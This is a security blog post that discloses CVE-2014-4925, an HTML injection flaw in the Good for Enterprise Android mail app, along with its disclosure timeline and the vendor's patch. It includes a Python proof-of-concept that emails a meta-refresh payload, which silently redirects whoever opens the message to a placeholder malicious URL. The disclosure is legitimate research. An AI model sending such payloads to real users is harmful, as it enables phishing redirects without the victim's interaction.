<!DOCTYPE html>
<html lang="en-us">
<head>
    <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <title>Good For Enterprise Android HTML Injection (CVE-2014-4925) &middot; March Of The Bits</title>
    <meta name="author" content="Cláudio André">
    <meta name="description" content="My infosec posts.">
    <meta name="generator" content="Hugo 0.25.1" />
    <meta name="HandheldFriendly" content="True">
    <meta name="MobileOptimized" content="320">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">

    <!-- RSS autodiscovery -->
    

    <link rel="shortcut icon" href="https://security.claudio.pt/img/favicon.ico">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">

    <!-- Stylesheets -->
    <link rel="stylesheet" href="https://security.claudio.pt/css/screen.css">
    <link rel="stylesheet" href="https://security.claudio.pt/css/github.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/styles/default.min.css">
    

    
    <link rel="shortcut icon" type="image/x-icon" href="https://security.claudio.pt/favicon.ico">
    <link rel="icon" type="image/x-icon" href="https://security.claudio.pt/favicon.ico">
    

    <!-- Stylesheet for theme color -->
    <style type="text/css">
    a, a:visited {color: #f05948;}
    .pagination a {color: #f05948;}
    .gist .gist-file .gist-meta a:visited {color: #f05948 !important;}
    a:focus, a:hover {color: #c62310;}
    h1.post-title a:focus, h1.post-title a:hover, h1.blog-title a:focus, h1.blog-title a:hover {color: #c62310;}
    .older-posts:hover, .newer-posts:hover {color: #c62310;}
</style>
</head>

<body class="home-template">
    <header id="site-head">
	
	<h1 class="blog-title"><a href="https://security.claudio.pt/">March Of The Bits</a></h1>
	
	
	<h1 class="blog-subtitle">My infosec posts.</h1>
	
</header>
    
    
    <main class="content" role="main">
    
<article class="post">
    <header>
        <h1 class="post-title">Good For Enterprise Android HTML Injection (CVE-2014-4925)</h1>
        <div class="post-meta">
            <time datetime="08 January 2015">
                08 January 2015
            </time>
        </div>
    </header>

    <section class="post-content">
        <p>We had a request from a client to test a Mobile Device Management solution from Good Technology currently being implemented and its client application Good for Enterprise.</p>

<blockquote>
<p>Good for Enterprise is built on Good next-gen containerization, which enables secure data sharing between Good-secured apps as well as app-level encryption independent of the device used. With next-gen containerization, Good for Enterprise protects corporate data including emails, business contacts, or files downloaded from corporate intranet on personal unmanaged and managed devices.
<a href="http://media.www1.good.com/documents/ds-good-for-enterprise.pdf">http://media.www1.good.com/documents/ds-good-for-enterprise.pdf</a></p>
</blockquote>

<p>During the pentest on the Android version of Good for Enterprise we identified a vulnerability on the Mail container of the app. It allowed some HTML tags such as <meta>.It was not possible to confirm, but the iOS should be vulnerable as well.</p>

<p>Using the <meta> tag is possible to redirect a user to a malicious url as soon has he opens the email without any kind of additional interaction as shown in the following example.</p>

<p><img src="/images/gfe-poc.gif" alt="GFE Poc" /></p>

<p>For POC the following Python script can be used.</p>

<pre><code>import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

fromaddr = ‘&lt;email@gmail.com&gt;’
toaddrs = ‘&lt;email@example.com&gt;’

msg = MIMEMultipart(‘alternative’)
msg[‘Subject’] = ‘Breaking Stuff’
msg[‘From’] = fromaddr
msg[‘To’] = toaddrs

html='&lt;meta http-equiv=”refresh” content=”0;URL=\’http://www.maliciousurl.com\'” /&gt;’
mime = MIMEText(html,’html’)
msg.attach(mime)

#Account Credentials
username = ‘&lt;email@gmail.com&gt;’
password = ‘&lt;password&gt;’

server = smtplib.SMTP(‘smtp.gmail.com:587’)
server.starttls()
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg.as_string())
server.quit()
</code></pre>

<p>The vulnerability was reported to the vendor on 16/4/2014 and after several interactions with the support, the support end up reporting this issue as unfixable and a product limitation. This is indeed a dangerous and very easy to explore vulnerability, so we decided to disclose publicly.</p>

<p>This exact vulnerability was identified on Outlook.com Android App last year. (<a href="https://labs.integrity.pt/articles/outlook-com-android-app-html-injection-vulnerability/">https://labs.integrity.pt/articles/outlook-com-android-app-html-injection-vulnerability/</a>)</p>

<p>Note: The version tested was the 1.9.0.40, but from the vendor feedback, all versions up to the latest one (2.8.0.398 as of the writing of this post) should be vulnerable.</p>

<p>Advisory URL: <a href="https://labs.integrity.pt/advisories/cve-2014-4925/">https://labs.integrity.pt/advisories/cve-2014-4925/</a></p>

<p><strong>UPDATE (27/1/2015):</strong> Vendor released patched version. Vulnerability is fixed. Version 2.8.1.402.</p>

<p><strong>UPDATE (8/1/2015):</strong> we received the feedback from Good Technology that a fix is in progress, so a patched version is expected soon. We will update the article and advisory accordingly.</p>

    </section>

    
    <section class="post-tags" style="padding-bottom:60px;">
        <div class="post-meta tags">
            <i class="fa fa-fw fa-tag"></i>
            
        </div>
    </section>
    
    <div id="disqus_thread"></div>
<script>
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "security-claudio-pt" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
    <section class="share">
    <p class="backtotop"><a data-scroll href="#site-head"><i class="fa fa-lg fa-fw fa-angle-double-up"></i></a><a data-scroll class="backtotoptext" href="#site-head"> Back to top</a></p>
    <p class="info prompt">Share</p>
    <a href="http://twitter.com/share?text=Good%20For%20Enterprise%20Android%20HTML%20Injection%20%28CVE-2014-4925%29&url=https%3a%2f%2fsecurity.claudio.pt%2fpost%2fgfe_html_injection%2f" title="Share on Twitter"
        onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;">
        <i class="fa fa-2x fa-fw fa-twitter-square"></i> <span class="hidden">Twitter</span>
    </a>
    <a href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2fsecurity.claudio.pt%2fpost%2fgfe_html_injection%2f" title="Share on Facebook"
        onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;">
        <i class="fa fa-2x fa-fw fa-facebook-square" style="margin-left: -8px"></i> <span class="hidden">Facebook</span>
    </a>
    <a href="https://plus.google.com/share?url=https%3a%2f%2fsecurity.claudio.pt%2fpost%2fgfe_html_injection%2f" title="Share on Google+"
       onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;">
        <i class="fa fa-2x fa-fw fa-google-plus-square" style="margin-left: -8px"></i> <span class="hidden">Google+</span>
    </a>
</section>

    <footer class="post-footer">
        <section class="author">
    <div class="authorimage" style="background: url(https://security.claudio.pt/img/avatar.jpg)"></div>
    <h4>Cláudio André</h4>
    <p class="bio">Security Learner. Hobbyist Photographer.</p>
    <p class="meta">
      
    </p>
</section>
    </footer>
    
</article>

    </main>

    <footer class="site-footer">
	<div class="inner">
		<section class="footer-social">
      
      <a href="//twitter.com/clviper" target="_blank" title="Twitter"><i class="fa fa-2x fa-fw fa-twitter"></i> <span class="hidden">Twitter</span></a>&nbsp;
      
      
      
      
      
      
      <a href="//github.com/clviper" target="_blank" title="GitHub"><i class="fa fa-2x fa-fw fa-github"></i> <span class="hidden">GitHub</span></a>&nbsp;
      
      
      
      
  </section>

		<section class="copyright">&copy; 2018 <a href="https://security.claudio.pt/">Cláudio André</a>. </section>
	</div>
</footer>

    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script src="https://security.claudio.pt/js/index.js"></script>
<script src="https://security.claudio.pt/js/smooth-scroll.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/highlight.min.js"></script>


<script>
    smoothScroll.init({
        speed: 800,
        easing: 'easeInOutCubic',
        updateURL: false,
        offset: 125,
    });
</script>
<script>hljs.initHighlightingOnLoad();</script>


<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-65729916-1', 'auto');
ga('send', 'pageview');
</script>

</body>
</html>